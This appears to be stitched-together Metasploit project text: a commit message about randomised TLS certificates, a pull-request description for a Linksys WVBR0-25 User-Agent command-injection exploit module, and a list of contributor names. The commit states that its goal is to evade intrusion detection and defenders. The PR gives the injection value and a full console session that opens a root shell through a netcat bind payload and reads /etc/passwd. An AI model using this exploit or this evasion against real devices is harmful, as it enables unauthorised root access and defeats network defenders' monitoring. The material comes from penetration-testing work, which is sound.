Add an explicit require for the new cert_provider in framework.rb
in case it has not yet been loaded.
This should address the Travis failure on initial PR, although the
gem version in socket has not been updated, so this might take a
bit to propagate. In the end, if the dependency already gives us
this functionality by the time we call Rex::Socket::Ssl then this
commit can safely be dropped
Msf relies on Rex::Socket to create TLS certificates for services
hosted in the framework and used by some payloads. These certs are
flagged by NIDS - snort sid 1-34864 and such.
Now that Rex::Socket can accept a @@cert_provider from the Msf
namespace, a more robust generation routine can be used by all TLS
socket services, provided down from Msf to Rex, using dependencies
which Rex does not include.
This work adds the faker gem into runtime dependencies, creates an
Msf::Exploit::Remote::Ssl::CertProvider namespace, and provides
API compatible method invocations with the Rex version, but able
to generate higher entropy certs with more variables, options, etc.
This should reduce the hit rate against NIDS on the wire, reducing
pesky blue team interference until we slip up some other way. Also,
with the ability to generate different cert types, we may want to
look at extending this effort to probide a more comprehensive key
oracle to Framework and consumers.
Testing:
None yet, internal tests pending.
Travis should fail as this requires rex-socket #8.
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
HeadlessZeke
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
Description:
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
References:
http://cvedetails.com/cve/2017-17411/http://www.zerodayinitiative.com/advisories/ZDI-17-973https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y
[*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root❌0:0::/:/bin/sh nobody❌99:99:Nobody:/:/bin/nologin sshd❌22:22::/var/empty:/sbin/nologin admin❌1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga❌1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
Jeffrey Martin
Brent Cook
Jan-Frederik Rieckers
RageLtMan
Metasploit
Pearce Barry
james
Matthew Kienow
Jon Hart
Tod Beardsley
juushya
b0yd
headlesszeke
William Vu